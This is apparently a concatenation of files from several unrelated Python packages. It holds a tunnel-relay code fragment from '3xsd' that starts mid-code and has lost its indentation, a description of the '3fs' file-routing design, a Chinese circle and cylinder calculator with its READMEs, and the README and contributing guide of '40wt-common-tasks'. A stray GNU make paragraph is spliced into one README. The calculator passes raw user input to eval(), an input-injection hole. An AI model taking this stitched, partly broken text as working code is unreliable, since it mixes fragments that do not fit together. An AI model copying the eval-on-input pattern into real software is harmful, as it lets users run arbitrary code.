_unzip = lambda s : eval(_compress).decompress(s) if _compress and _magic[_compress][0] in s[:_magic[_compress][1]] else s
_forward2_tun = lambda s : self.server.zsess[_session][0].write(_unzip(self.decrypt_package(s, _encrypt_mode, _session))) if _encrypt_mode else self.server.zsess[_session][0].write(_unzip(s))
_repack = lambda s : ''.join([struct.pack('!H', len(s)), s])
try:
#for i in xrange(10):
if _session not in self.udt_relay:
_forward2_tun(u.recv(struct.unpack('!H', u.recv(2))[0]))
else:
_from, _to = self.udt_relay[_session]
if _session == _from:
_to_s = _to
else:
_to_s = _from
_, _to_usock, _ = self.server.zsess.get(_to_s, (None, None, None))
if _to_usock:
#print "relaying tunnel", _session, "to", self.udt_relay[_session]
_buf = u.recv(struct.unpack('!H', u.recv(2))[0])
_to_usock.send(_repack(_buf))
else:
#relay two sides not full connected yet
continue
except udt4.UDTException as e:
if e[0] == udt4.EASYNCRCV:
#recv buffer empty, no more data to read
#print "recv", i, "packages from udt and write in", _t2 - _t1, "secs"
continue
elif e[0] == udt4.EASYNCSND:
#send buffer full, just for relaying case
if _to_s in self.server.udt_send_buf:
self.server.udt_send_buf[_to_s].append(_buf)
else:
self.server.udt_send_buf[_to_s] = deque([_buf])
_ux = _conn.UDTSOCKET.UDTSOCKET % self.server.udt_thread_limit
self.server.upolls[_ux].remove_usock(u)
self.server.upolls[_ux].add_usock(u, udt4.UDT_EPOLL_IN|udt4.UDT_EPOLL_OUT)
if u.getsockstate() > 5:
self.server.upolls[_un % self.server.udt_thread_limit].remove_usock(u)
self.udt_relay_thread_stat[_session] = False
except IOError as e:
if e.errno == errno.EINVAL:
#illegal data, maybe tunnel peer shutdown suddenly
continue
for u in sets[1]:
_un = u.UDTSOCKET.UDTSOCKET
if _un in self.server.s_udts:
_session = self.server.s_udts[_un]
else:
continue
if _session in self.server.udt_send_buf:
try:
u.send(self.server.udt_send_buf[_session][0])
self.server.udt_send_buf[_session].popleft()
if len(self.server.udt_send_buf[_session]) == 0:
self.server.udt_send_buf.pop(_session, None)
except:
if u.getsockstate() > 5:
self.server.udt_send_buf.pop(_session, None)
self.server.upolls[_un % self.server.udt_thread_limit].remove_usock(u)
else:
_ux = u.UDTSOCKET.UDTSOCKET % self.server.udt_thread_limit
self.server.upolls[_ux].remove_usock(u)
self.server.upolls[_ux].add_usock(u, udt4.UDT_EPOLL_IN)
for _tun in sets[2]:
if _tun.fileno() == -1: continue
_session = self.server.s_tuns[_tun.fileno()]
_, _conn = self.server.zsess[_session][:2]
_encrypt_mode = self.sess_encrypt_mode[_session] if _session in self.sess_encrypt_mode else self.encrypt_mode
_compress = self.compress_tunnel[_session] if _session in self.compress_tunnel else None
_zip = lambda s : eval(_compress).compress(s) if _compress and len(s) < _tun.mtu - 100 else s
_encrypt=lambda s : self.encrypt_package(_zip(s), _encrypt_mode, _session) if _encrypt_mode else _zip(s)
_repack = lambda s : ''.join([struct.pack('!H', len(s)), s])
try:
#for i in xrange(10):
_buf = _repack(_encrypt(_tun.read(_tun.mtu)))
_conn.send(_buf)
except IOError as e:
#no more tun data to read
#print "read", i+1, "packages from tun, and sent in", _t2 - _t1, "secs"
continue
except udt4.UDTException as e:
if e[0] == udt4.EASYNCSND:
#send buffer full
if _session in self.server.udt_send_buf:
self.server.udt_send_buf[_session].append(_buf)
else:
self.server.udt_send_buf[_session] = deque([_buf])
_ux = _conn.UDTSOCKET.UDTSOCKET % self.server.udt_thread_limit
self.server.upolls[_ux].remove_usock(_conn)
self.server.upolls[_ux].add_usock(_conn, udt4.UDT_EPOLL_IN|udt4.UDT_EPOLL_OUT) | 3xsd | /3xsd-0.0.26.tar.gz/3xsd-0.0.26/_3xsd.py | _3xsd.py |
3fs is designed to solve the problem of mass files storage at a cluster of servers, with simple HTTP protocol to access, easy to expand and none centralized architecture.
At internet, most files are stored at web servers, can access using base HTTP protocol: GET/HEAD/PUT/DELETE method. A cluster of servers with WebDAV support, and a set of "routing" servers(3fsd), together make up of a 3fs.
user ----- 3fsd ------ web server
|--------- .....
user ----- 3fsd ------ web server
|--------- web server
3fsd ------ .....
|--------- web server
The architecture is simple: 3fsd acts as a "router" or "proxy" — it locates the URI, forwards the request to the corresponding storage server, returns the response to the user and caches it. GET/HEAD requests are forwarded unconditionally; PUT/DELETE requests are forwarded only after being authorized (based on the client IP).
URI location algorithm
Let's take an example, accessing a 3fs file /path/to/file should use a uri in this form:
http://a.net/_3fs_0/path/to/file
"_3fs" is called the 3fs prefix, uri with it inside, identifying a access to a 3fs file.
"_0", number 0 called stage number, range 0 to max of interger.
a set of server running for sometime, called a stage, it's a relatively fixed state. server numbers, configs, etc.
When you expand your cluster, let say: add some servers to expand storage capability, stage plus one, the adding servers belong to this stage. Plusing stage procedure should not rollback.
When a file been added to cluster, use the current stage num to make the uri. As above, /path/to/file beening added at stage 0.
The 3fs config also has an item called "region": the maximum number of servers in one stage. region=4096 means you can add/expand at most 4096 servers at a time. It affects the location algorithm, so it must stay fixed for the lifetime of a 3fs deployment — choose it carefully.
Ok, here is how the location algorithm does:
/path/to/file will be calculated to a md5: b4a91649090a2784056565363583d067
assumed that region=256(FF), stage=0, and we have 10 servers at stage 0.
region mask FF0000000000000000000000000000, we got "b4", the first 2 hex num in md5.
0xb4=180, 180/(256/10) = 7.03125, rounded to 7, server 7(0-9), will have it.
Redundancy=2, we have 2 copy of data storaged. How to locate all of them?
As above, the second copy's location is at "a9", the second 2 hex num in md5, 6.601, rounded at server 6. If it's same with first one, just has the server num plus one, server 8 then.
In theory, with region=256, we can have redundancy=16, with region=4096, redundancy=10.
As you can see, at a stage, fixed number of servers, 3fsd can locate the file exactly, algorithm execution time O(1).
When expanding the cluster, old files with old stage num in uri, can be located normally, also the new files with new stage num.
When file is changed, it keeps the stage num original. When deleted and adding again, use the new stage num.
Of course, a server can belong to multiple stages: server A can belong to stages 0, 1 and 2 if its capacity is large enough.
The pool=... config item is a list of servers at different stages and should be kept fixed at the stage level; that is, you can't add a server to an existing stage at will — adding servers must increase the stage number. The order of the servers doesn't matter: 3fsd will sort them per stage.
# 3yzh
A three-circle calculator, It contains Circle Circles and Cylinders.
It is in Chinese. If you can read and write Chinese, you can use it.
Now you can download it, run ``python 3y``, and it will start.
Please comply with local laws and regulations,
User only has the right to use
The final interpretation belongs to the author
For mainland China only.
You can see or read the log in log.py
This means that you have read and agreed to all the above regulations.
Welcome Download and use! | 3y | /3y-2.6.4.tar.gz/3y-2.6.4/README.rst | README.rst |
from __init__ import *
# Lowercase Greek pi, appended to results in the "keep pi symbolic" mode.
pai2 = 'π'
def part_yh():
    """Interactive annulus (ring) calculator with a Chinese text UI.

    Repeatedly reads the outer radius r1 and the inner radius r2, then a
    menu choice:
      1 -- pi = 3.14          2 -- high-precision pi (pai1 from __init__)
      3 -- keep pi symbolic   4 -- user-defined pi in [3, 3.2)
      5 -- back to the mode menu; anything else exits via tc().
    Prints the ring area, both circumferences and both circle areas.
    """
    # ring section
    while True:
        r1=input('请输入外圆半径:')  # read r1 (outer radius)
        try:
            r1=eval(r1)
        except (IOError,ValueError,TypeError,SyntaxError,EOFError,NameError):
            print('输入符号时注意是英文的,输入正确数字')
        except ZeroDivisionError:
            print('除数不能为0,emmm,2年级小孩都知道')
        # NOTE(review): if eval() failed above, r1 is still a str and this
        # comparison raises TypeError -- same pattern throughout this file.
        if r1<=0.00000000:
            print('可能是你输入的数太小了\n1.内圆半径不允许大于等于外圆半径\n2.重新选择模式使用\n *注意外圆半径和内圆半径的顺序,上面是外圆半径')
            print('2秒后切换模式')
            dd(2)
            break
        r2=input('请输入内圆半径:')  # read r2 (inner radius)
        try:
            r2=eval(r2)
        except (IOError,ValueError,TypeError,SyntaxError,EOFError,NameError):
            print('输入符号时注意是英文的,输入正确数字')
        except ZeroDivisionError:
            print('除数不能为0,emmm,2年级小孩都知道')
        if r2<=0.000000000:
            print('可能是你输入的数太小了\n1.内圆半径不允许大于等于外圆半径\n2.重新选择模式使用\n *注意外圆半径和内圆半径的顺序,上面是外圆半径')
            print('2秒后切换模式')
            dd(2)
            break
        print('【圆环】')
        aboutpi()
        xxx=input('请输入(1,2,3,4,5)中的一个数字:')
        print(' ')
        try:
            xxx=int(xxx)
        except (IOError,ValueError,TypeError,SyntaxError,EOFError,NameError):
            print('请输入正确的整数')
        except ZeroDivisionError:
            print('除数不能为0,emmm,2年级小孩都知道')
        print(' ')
        if xxx>5 or xxx<=0:
            # quit: show elapsed time, wait, exit via tc()
            end1=sj.now()-start
            print('即将\033[10;31m退出\033[0m,','本次使用时间:',end1,'\n程序将在5秒后关闭,谢谢使用')
            dd(5)
            tc('谢谢使用')
        elif xxx==5:
            # back to the mode menu
            print('-'*40)
            print('0.1s后切换模式')
            dd(0.1)
            break
        elif xxx==1:
            # pi approximated as 3.14
            Sr1=r1*r1*3.14  # outer circle area
            Sr2=r2*r2*3.14  # inner circle area
            S=Sr1-Sr2       # ring area
            C1=6.28*r1      # outer circumference
            C2=6.28*r2      # inner circumference
            if S>0:
                dw()
                print('=====计算结果=====')
                print('圆环面积=','{:.6f}'.format(S))
                print('外圆周长=','{:.6f}'.format(C1))
                print('内圆周长=','{:.6f}'.format(C2))
                print('外圆面积=','{:.7f}'.format(Sr1))
                print('内圆面积=','{:.7f}'.format(Sr2))
            else:
                print('可能是你输入的数太小了\n1.内圆半径不允许大于等于外圆半径\n2.重新选择模式使用\n *注意外圆半径和内圆半径的顺序,上面是外圆半径')
                print('1秒后切换模式')
                dd(1)
                break
        elif xxx==2:
            # high-precision pi (pai1 imported from __init__)
            Sr1=r1*r1*pai1  # outer circle area
            Sr2=r2*r2*pai1  # inner circle area
            S=Sr1-Sr2       # ring area
            C1=2*pai1*r1    # outer circumference
            C2=2*pai1*r2    # inner circumference
            if S>0:
                dw()
                print('=====计算结果=====')
                print('圆环面积=','{:.6f}'.format(S))
                print('外圆周长=','{:.6f}'.format(C1))
                print('内圆周长=','{:.6f}'.format(C2))
                print('外圆面积=','{:.7f}'.format(Sr1))
                print('内圆面积=','{:.7f}'.format(Sr2))
            else:
                print('可能是你输入的数太小了\n1.内圆半径不允许大于等于外圆半径\n2.重新选择模式使用\n *注意外圆半径和内圆半径的顺序,上面是外圆半径')
                print('1秒后切换模式')
                dd(1)
                break
        elif xxx==3:
            # keep pi symbolic: results are printed as coefficients of pi
            Sr1=r1*r1  # outer circle area
            Sr2=r2*r2  # inner circle area
            # fix: was "S=Sr1-Sr2,6" -- the trailing ",6" built a tuple, so
            # "if S>0" raised TypeError in Python 3
            S=Sr1-Sr2  # ring area
            C1=2*r1    # outer circumference
            C2=2*r2    # inner circumference
            if S>0:
                dw()
                print('=====计算结果=====')
                print('圆环面积=','{:.6f}'.format(S),pai2)
                print('外圆周长=','{:.6f}'.format(C1),pai2)
                print('内圆周长=','{:.6f}'.format(C2),pai2)
                print('外圆面积=','{:.7f}'.format(Sr1),pai2)
                print('内圆面积=','{:.7f}'.format(Sr2),pai2)
            else:
                print('可能是你输入的数太小了\n1.内圆半径不允许大于等于外圆半径\n2.重新选择模式使用\n *注意外圆半径和内圆半径的顺序,上面是外圆半径')
                print('1秒后切换模式')
                dd(1)
                break
        elif xxx==4:
            defpi=input('请输入要自定义的π(大于等于3且小于3.2)->')
            try:
                defpi=eval(defpi)
            except (IOError,ValueError,TypeError,SyntaxError,EOFError,NameError):
                print('请输入正确的数字')
            except ZeroDivisionError:
                print('除数不能为0,emmm,2年级小孩都知道')
            if defpi<3 or defpi >3.2:
                print('0.3秒后切换模式')
                dd(0.3)
                break
            if defpi >=3 and defpi <3.2:
                print('最后结果精确到小数点后8位')
                # fix: these five lines ended in ",8" (leftover round()
                # arguments) which turned them into tuples and crashed the
                # arithmetic; C1 was also missing its "*r1" factor (outer
                # circumference is 2*pi*r1, matching the other modes).
                Sr1=r1*r1*defpi  # outer circle area
                Sr2=r2*r2*defpi  # inner circle area
                S=Sr1-Sr2        # ring area
                C1=2*defpi*r1    # outer circumference
                C2=2*defpi*r2    # inner circumference
                if S>0:
                    dw()
                    print('=====计算结果=====')
                    print('圆环面积=','{:.8f}'.format(S))
                    print('外圆周长=','{:.8f}'.format(C1))
                    print('内圆周长=','{:.8f}'.format(C2))
                    print('外圆面积=','{:.8f}'.format(Sr1))
                    print('内圆面积=','{:.8f}'.format(Sr2))
                else:
                    print('可能是你输入的数太小了\n1.内圆半径不允许大于等于外圆半径\n2.重新选择模式使用\n *注意外圆半径和内圆半径的顺序,上面是外圆半径')
                    print('1秒后切换模式')
                    dd(1)
                    break
        else:
            end=sj.now()-start
            print('即将\033[10;31m退出\033[0m,','本次使用时间:',end,'\n程序将在5秒后关闭,谢谢使用')
            dd(5)
            tc('谢谢使用')
from __init__ import *
# Lowercase Greek pi, used below when results are kept symbolic in pi.
pai2 = 'π'
def part_yz():
    """Interactive cylinder calculator with a Chinese text UI.

    Repeatedly reads radius r and height H, then a menu choice:
      1 -- pi = 3.14          2 -- high-precision pi (pai1 from __init__)
      3 -- keep pi symbolic   4 -- user-defined pi in [3, 3.2)
      5 -- back to the mode menu; anything else exits via tc().
    Prints circle circumference/areas, lateral area, volume, surface area.
    """
    while True:
        r=input('请输入半径:')  # read the radius
        try:
            r=eval(r)
        except (IOError,ValueError,TypeError,SyntaxError,EOFError,NameError):
            print('')
        except ZeroDivisionError:
            print('除数不能为0,emmm,2年级小孩都知道')
        # NOTE(review): this help line prints on every pass, not only on
        # bad input -- looks misplaced; confirm the author's intent.
        print('请使用正确符号或正确数字')
        H=input('请输入高:')  # read the height
        try:
            H=eval(H)
        except (IOError,ValueError,TypeError,SyntaxError,EOFError,NameError):
            print('请使用正确符号或正确数字')
        except ZeroDivisionError:
            print('除数不能为0,emmm,2年级小孩都知道')
        print('【圆柱】')
        aboutpi()
        xxx=input('请输入(1,2,3,4,5)中的一个数字:')
        print(' ')
        try:
            xxx=int(xxx)
        except (IOError,ValueError,TypeError,SyntaxError,EOFError,NameError):
            print('请输入有效数字')
        except ZeroDivisionError:
            print('除数不能为0,emmm,2年级小孩都知道')
        # reject non-positive dimensions and go back to the mode menu
        if r<=0 or H<=0:
            print('虽然输入成功,但是为什么弹出选择模式,自己想想为什么')
            print('0.1秒后切换模式')
            dd(0.1)
            break
        print(' ')
        if xxx>5 or xxx<=0:
            # quit: show elapsed time, wait, exit via tc()
            end1=sj.now()-start
            print('即将\033[10;31m退出\033[0m,','本次使用时间:',end1,'\n程序将在5秒后关闭,谢谢使用')
            dd(5)
            tc('谢谢使用')
        elif xxx==5:
            # back to the mode menu
            print('-'*40)
            print('切换模式')
            print('0.1秒后切换模式')
            dd(0.1)
            break
        elif xxx==1:
            # pi approximated as 3.14
            dw()
            sU=r*r*3.14  # top circle area
            sD=sU*2      # area of both end circles
            d=2*r        # diameter
            C=d*3.14     # circumference
            Sc=C*H       # lateral area
            S=sD+Sc      # total surface area
            V=sU*H       # volume
            # NOTE(review): "(S or C or ...)<=0" compares only the first
            # truthy value of the chain, not every variable -- verify intent.
            if r<=0 and H<=0 or (S or C or Sc or sD or sU or d)<=0 :  # sanity re-check
                print('请重新输入半径和高,因为其中一个小于0或者数太小了,就像0.0001这样的,所以停止运行了')
                print('请选择模式,再次尝试运行')
                dd(0.5)
                break
            elif r>0 and H>0:
                dw()
                print('======计算结果======')
                print('当半径=',r,'直径=',d,'高=',H,'时')
                print('\n一个圆的周长=','{:.7f}'.format(C))
                print('一个圆的面积=','{:.7f}'.format(sU))
                print('两个圆的面积=','{:.7f}'.format(sD))
                print('圆柱的侧面积=','{:.7f}'.format(Sc))
                print('圆柱的体积=','{:.7f}'.format(V))
                print('圆柱的表面积=','{:.7f}'.format(S))
            else:
                print('重新输入半径和高,无需关闭')
                print('如果下面没有弹出请输入半径和请输入高,请关闭后重新打开')
        elif xxx==2:
            # high-precision pi (pai1 imported from __init__)
            sU=r*r*pai1  # top circle area
            sD=sU*2      # area of both end circles
            d=2*r        # diameter
            C=d*pai1     # circumference
            Sc=C*H       # lateral area
            S=sD+Sc      # total surface area
            V=sU*H       # volume
            if r<=0 and H<=0 or (S or C or Sc or sD or sU or d)<=0 :  # sanity re-check
                print('请重新输入半径和高,因为其中一个小于0或者数太小了,就像0.0001这样的,所以停止运行了')
                print('请重新打开,再次尝试运行')
                dd(0.5)
                break
            elif r>0 and H>0:
                dw()
                print('=====计算结果=====')
                print('当半径=',r,'直径=',d,'高=',H,'时')
                print('\n一个圆的周长=','{:.7f}'.format(C))
                print('一个圆的面积=','{:.7f}'.format(sU))
                print('两个圆的面积=','{:.7f}'.format(sD))
                print('圆柱的侧面积=','{:.7f}'.format(Sc))
                print('圆柱的体积=','{:.7f}'.format(V))
                print('圆柱的表面积=','{:.7f}'.format(S))
            else:
                print('重新输入半径和高,无需关闭')
                print('如果下面没有弹出请输入半径和请输入高,请重新打开')
        elif xxx==3:
            # keep pi symbolic: results are coefficients of pi
            sU=r*r   # top circle area
            sD=sU*2  # area of both end circles
            d=2*r    # diameter
            C=d      # circumference (coefficient of pi)
            Sc=C*H   # lateral area
            S=sD+Sc  # total surface area
            V=sU*H   # volume
            if r<=0 and H<=0 or (S or C or Sc or sD or sU or d)<=0 :  # sanity re-check
                print('请重新输入半径和高,因为其中一个小于0或者数太小了,就像0.0001这样的,所以停止运行了')
                print('请重新打开,再次尝试()运行')
                dd(0.5)
                break
            elif r>0 and H>0:
                dw()
                print('=====计算结果=====')
                print('当半径=',r,'直径=',d,'高=',H,'时')
                print('\n一个圆的周长=','{:.7f}'.format(C),pai2)
                print('一个圆的面积=','{:.7f}'.format(sU),pai2)
                print('两个圆的面积=','{:.7f}'.format(sD),pai2)
                print('圆柱的侧面积=','{:.7f}'.format(Sc),pai2)
                print('圆柱的体积=','{:.7f}'.format(V),pai2)
                print('圆柱的表面积=','{:.7f}'.format(S),pai2)
            else:
                print('重新输入半径和高')
        elif xxx==4:
            # user-defined pi, accepted only in [3, 3.2)
            defpi=input('(请输入你要自定义的π,但是不要小于3或大于等于3.2):')
            try:
                defpi=eval(defpi)
            except (IOError,ValueError,TypeError,SyntaxError,EOFError,NameError):
                print('请输入指定范围的数字')
            except ZeroDivisionError:
                print('除数不能为0,emmm,2年级小孩都知道')
            if defpi<3 or defpi >3.2:
                print('0.3秒后切换模式')
                dd(0.3)
                break
            if defpi >=3 and defpi <3.2:
                sU=r*r*defpi  # top circle area
                sD=sU*2       # area of both end circles
                d=2*r         # diameter
                C=d*defpi     # circumference
                Sc=C*H        # lateral area
                S=sD+Sc       # total surface area
                V=sU*H        # volume
                if r<=0 and H<=0 or (S or C or Sc or sD or sU or d)<=0 :  # sanity re-check
                    print('请重新输入半径和高,因为其中一个小于0或者数太小了,就像0.0001这样的,所以停止运行了')
                    print('请重新打开,再次尝试运行')
                    dd(0.5)
                    break
                elif r>0 and H>0:
                    dw()
                    print('=====计算结果=====')
                    print('当半径=',r,'直径=',d,'高=',H,'时')
                    print('\n一个圆的周长=','{:.8f}'.format(C))
                    print('一个圆的面积=','{:.8f}'.format(sU))
                    print('两个圆的面积=','{:.8f}'.format(sD))
                    print('圆柱的侧面积=','{:.8f}'.format(Sc))
                    print('圆柱的体积=','{:.8f}'.format(V))
                    print('圆柱的表面积=','{:.8f}'.format(S))
                else:
                    print('重新输入半径和高,无需关闭')
                    print('如果下面没有弹出请输入半径和请输入高,请重新打开(运行)')
        else:
            end1=sj.now()-start
            print('即将\033[10;31m退出\033[0m,','本次使用时间:',end1,'\n程序将在5秒后关闭,谢谢使用')
            dd(5)
            tc('谢谢使用')
Documentation
-------------
GNU make is fully documented in the GNU Make manual, which is contained
in this distribution as the file make.texinfo. You can also find
on-line and preformatted (PostScript and DVI) versions at the FSF's web
site. There is information there about
* MADE IN CHINA,From a Chinese student
* The Peoject in Chinese
The project is about Circle , Circular ring and Cylinder
This project is in Chinese version and is for mainland China only
my qq emali address:3046479366@qq.com
When you are using this project,You will agree to the following.
1.Follow your local laws and don't break the law. If you break the law, the author will not take any responsibility
2. When you use the project, please use it reasonably. If you find bugs while using the project, you can send an email to 3046479366@qq.com
3.The final interpretation belongs to the author .
4.Don't steal the source code, if you find someone stealing my source code, you can tell me by email, I will give you some compensation | 3y | /3y-2.6.4.tar.gz/3y-2.6.4/README.txt | README.txt |
# 3yzh
A three-circle calculator, It contains Circle Circles and Cylinders.
It is in Chinese. If you can read and write Chinese, you can use it.
Now you can download it, run `python 3y`, and it will start.
Please comply with local laws and regulations,
User only has the right to use
The final interpretation belongs to the author
For mainland China only.
You can see or read the log in log.py
This means that you have read and agreed to all the above regulations.
Welcome Download and use!
* MADE IN CHINA,From a Chinese student
* The Peoject in Chinese
The project is about Circle , Circular ring and Cylinder
This project is in Chinese version and is for mainland China only
my qq emali address:3046479366@qq.com
When you are using this project,You will agree to the following.
1.Follow your local laws and don't break the law. If you break the law, the author will not take any responsibility
2. When you use the project, please use it reasonably. If you find bugs while using the project, you can send an email to 3046479366@qq.com
3.The final interpretation belongs to the author .
4.Don't steal the source code, if you find someone stealing my source code, you can tell me by email, I will give you some compensation
| 3y | /3y-2.6.4.tar.gz/3y-2.6.4/README.md | README.md |
from __init__ import *
# 即将更新log:1把每个判断放到input下面2print ('{} '.format(j))3.过多的无效代码行
# Lowercase Greek pi, appended to results in the "keep pi symbolic" mode.
pai2 = 'π'
def part_y():
    """Interactive circle calculator with a Chinese text UI.

    Repeatedly reads radius r, then a menu choice:
      1 -- pi = 3.14          2 -- high-precision pi (pai1 from __init__)
      3 -- keep pi symbolic   4 -- user-defined pi in [3, 3.2)
      5 -- back to the mode menu; anything else exits via tc().
    Prints the circumference and the area.
    """
    while True:
        r=input('请输入圆的半径:')  # read the radius
        try:
            r=eval(r)
        except (IOError,ValueError,TypeError,SyntaxError,EOFError,NameError):
            print('请输入有效数字')
        except ZeroDivisionError:
            print('除数不能为0,emmm,2年级小孩都知道')
        # reject non-positive radius and go back to the mode menu
        if r<=0:
            print('\n2个问题,要不你输入的数太小(0.0001 0.001…),python一算结果就是0\n要不然就是r<0,你见过r小于0的吗?\n1请重新输入选择模式使用')
            print('0.3秒后切换模式')
            dd(0.3)
            break
        print('【圆】')
        aboutpi()
        xxx=input('请输入(1,2,3,4,5)中的一个数字:')
        print(' ')
        try:
            xxx=int(xxx)
        except (IOError,ValueError,TypeError,SyntaxError,EOFError,NameError):
            # bad menu input: back to the mode menu
            print('请输入指定范围的整数')
            print('退出…1s后切换模式')
            dd(1)
            break
        except ZeroDivisionError:
            print('除数不能为0,emmm,2年级小孩都知道')
        if xxx>5 or xxx<=0:
            # quit: show elapsed time, wait, exit via tc()
            end1=sj.now()-start
            print('即将\033[10;31m退出\033[0m,','本次使用时间:',end1,'\n程序将在3秒后关闭,谢谢使用')
            dd(3)
            tc('谢谢使用')
        elif xxx==5:
            # back to the mode menu
            print('-'*40)
            print('0.3秒后切换模式')
            dd(0.3)
            break
        elif xxx==1:
            # pi approximated as 3.14
            # NOTE(review): r<=0 was already rejected above, so this
            # re-check cannot trigger here.
            if r<=0:
                print('\n2个问题,要不你输入的数太小(0.0001 0.001…),python一算结果就是0\n要不然就是r<0,你见过r小于0的吗?\n1请重新输入选择模式使用')
                print('0.3秒后切换模式')
                dd(0.3)
                break
            d=2*r  # diameter
            ra=r**2
            s=3.14*ra  # area
            c=3.14*d   # circumference
            dw()
            print('======计算结果======')
            print('当半径=',r,'直径=',d,'时')
            print('周长=','{:.6f}'.format(c))
            print('面积=','{:.6f}'.format(s))
        elif xxx==2:  # pi taken from pai1
            if r<=0:
                print('\n2个问题,要不你输入的数太小(0.0001 0.001…),python一算结果就是0\n要不然就是r<0,你见过r小于0的吗?\n请重新输入选择模式使用')
                print('0.3秒后切换模式')
                dd(0.3)
                break
            d=2*r  # diameter
            ra=r**2
            s=pai1*ra  # area
            c=pai1*d
            dw()
            print('======计算结果======')
            print('当半径=',r,'直径=',d,'时')
            print('周长=','{:.8f}'.format(c))
            print('面积=','{:.8f}'.format(s))
        elif xxx==3:  # keep pi symbolic
            if r<=0:
                print('2个问题,要不你输入的数太小(0.0001 0.001…),python一算结果就是0\n要不然就是r<0,你见过r小于0的吗?\n请重新选择模式后运行')
                print('0.3秒后切换模式')
                dd(0.3)
                break
            d=2*r  # diameter
            ra=r**2
            # results are coefficients of pi, shown to 8 decimal places
            s=ra   # area
            c=r*2  # circumference
            dw()
            print('======计算结果======')
            print('当半径=',r,'直径=',d,'时')
            print('周长=','{:.8f}'.format(c),pai2)
            print('面积=','{:.8f}'.format(s),pai2)
        elif xxx==4:
            # user-defined pi, accepted only in [3, 3.2)
            defpi=input('(请输入你要自定义的π,但是不要小于3或大于等于3.2):')
            try:
                defpi=eval(defpi)
            except (ValueError,TypeError,IOError):
                print('请输入指定范围的数字')
            except ZeroDivisionError:
                print('除数不能为0,emmm,2年级小孩都知道')
            # NOTE(review): out-of-range custom pi exits the whole program
            # here, unlike yh.py/yz.py which return to the mode menu.
            if defpi<3 or defpi >3.2:
                end=sj.now()-start
                print('本次使用时间:',end)
                print('拜拜了您嘞,自己想想为什么,别生气哈,想明白后再用,5秒钟后关闭')
                dd(5)
                tc('谢谢使用')
            if defpi >=3 and defpi <3.2:
                if r<=0:
                    print('2个问题,要不你输入的数太小(0.0001 0.001…),python一算结果就是0\n要不然就是r<0,你见过r小于0的吗?\n请重新选择该模式使用')
                    print('0.3秒后切换模式')
                    dd(0.3)
                    break
                d=2*r  # diameter
                ra=r**2
                s=defpi*ra  # area
                c=defpi*d
                dw()
                print('======计算结果======')
                print('当半径=',r,'直径=',d,'时')
                print('周长=','{:.8f}'.format(c))
                print('面积=','{:.8f}'.format(s))
        else:
            end1=sj.now()-start
            print('即将\033[10;31m退出\033[0m,','本次使用时间:',end1,'\n程序将在5秒后关闭,谢谢使用')
            dd(5)
            tc('谢谢使用')
========
Overview
========
.. start-badges
.. list-table::
:stub-columns: 1
* - docs
- |docs|
* - tests
- | |travis| |requires|
|
* - package
- |version| |downloads| |wheel| |supported-versions| |supported-implementations|
.. |docs| image:: https://readthedocs.org/projects/40wt-common-tasks/badge/?style=flat
:target: https://readthedocs.org/projects/40wt-common-tasks
:alt: Documentation Status
.. |travis| image:: https://travis-ci.org/svetlyak40wt/40wt-common-tasks.svg?branch=master
:alt: Travis-CI Build Status
:target: https://travis-ci.org/svetlyak40wt/40wt-common-tasks
.. |requires| image:: https://requires.io/github/svetlyak40wt/40wt-common-tasks/requirements.svg?branch=master
:alt: Requirements Status
:target: https://requires.io/github/svetlyak40wt/40wt-common-tasks/requirements/?branch=master
.. |version| image:: https://img.shields.io/pypi/v/40wt-common-tasks.svg?style=flat
:alt: PyPI Package latest release
:target: https://pypi.python.org/pypi/40wt-common-tasks
.. |downloads| image:: https://img.shields.io/pypi/dm/40wt-common-tasks.svg?style=flat
:alt: PyPI Package monthly downloads
:target: https://pypi.python.org/pypi/40wt-common-tasks
.. |wheel| image:: https://img.shields.io/pypi/wheel/40wt-common-tasks.svg?style=flat
:alt: PyPI Wheel
:target: https://pypi.python.org/pypi/40wt-common-tasks
.. |supported-versions| image:: https://img.shields.io/pypi/pyversions/40wt-common-tasks.svg?style=flat
:alt: Supported versions
:target: https://pypi.python.org/pypi/40wt-common-tasks
.. |supported-implementations| image:: https://img.shields.io/pypi/implementation/40wt-common-tasks.svg?style=flat
:alt: Supported implementations
:target: https://pypi.python.org/pypi/40wt-common-tasks
.. end-badges
A collection of tasks for python invoke, to build and maintain python projects.
* Free software: BSD license
Installation
============
::
    pip install 40wt-common-tasks
Documentation
=============
https://40wt-common-tasks.readthedocs.org/
Development
===========
To run the all tests run::
tox
Note, to combine the coverage data from all the tox environments run:
.. list-table::
    :widths: 10 90
    :stub-columns: 1

    * - Windows
      - ::

            set PYTEST_ADDOPTS=--cov-append
            tox

    * - Other
      - ::

            PYTEST_ADDOPTS=--cov-append tox
| 40wt-common-tasks | /40wt-common-tasks-0.2.0.tar.gz/40wt-common-tasks-0.2.0/README.rst | README.rst |
============
Contributing
============
Contributions are welcome, and they are greatly appreciated! Every
little bit helps, and credit will always be given.
Bug reports
===========
When `reporting a bug <https://github.com/svetlyak40wt/40wt-common-tasks/issues>`_ please include:
* Your operating system name and version.
* Any details about your local setup that might be helpful in troubleshooting.
* Detailed steps to reproduce the bug.
Documentation improvements
==========================
40wt-common-tasks could always use more documentation, whether as part of the
official 40wt-common-tasks docs, in docstrings, or even on the web in blog posts,
articles, and such.
Feature requests and feedback
=============================
The best way to send feedback is to file an issue at https://github.com/svetlyak40wt/40wt-common-tasks/issues.
If you are proposing a feature:
* Explain in detail how it would work.
* Keep the scope as narrow as possible, to make it easier to implement.
* Remember that this is a volunteer-driven project, and that code contributions are welcome :)
Development
===========
To set up `40wt-common-tasks` for local development:
1. Fork `40wt-common-tasks <https://github.com/svetlyak40wt/40wt-common-tasks>`_
(look for the "Fork" button).
2. Clone your fork locally::
git clone git@github.com:your_name_here/40wt-common-tasks.git
3. Create a branch for local development::
git checkout -b name-of-your-bugfix-or-feature
Now you can make your changes locally.
4. When you're done making changes, run all the checks, the doc builder and the spell checker with a single `tox <http://tox.readthedocs.org/en/latest/install.html>`_ command::
tox
5. Commit your changes and push your branch to GitHub::
git add .
git commit -m "Your detailed description of your changes."
git push origin name-of-your-bugfix-or-feature
6. Submit a pull request through the GitHub website.
Pull Request Guidelines
-----------------------
If you need some code review or feedback while you're developing the code just make the pull request.
For merging, you should:
1. Include passing tests (run ``tox``) [1]_.
2. Update documentation when there's new API, functionality etc.
3. Add a note to ``CHANGELOG.rst`` about the changes.
4. Add yourself to ``AUTHORS.rst``.
.. [1] If you don't have all the necessary python versions available locally you can rely on Travis - it will
`run the tests <https://travis-ci.org/svetlyak40wt/40wt-common-tasks/pull_requests>`_ for each change you add in the pull request.
It will be slower though ...
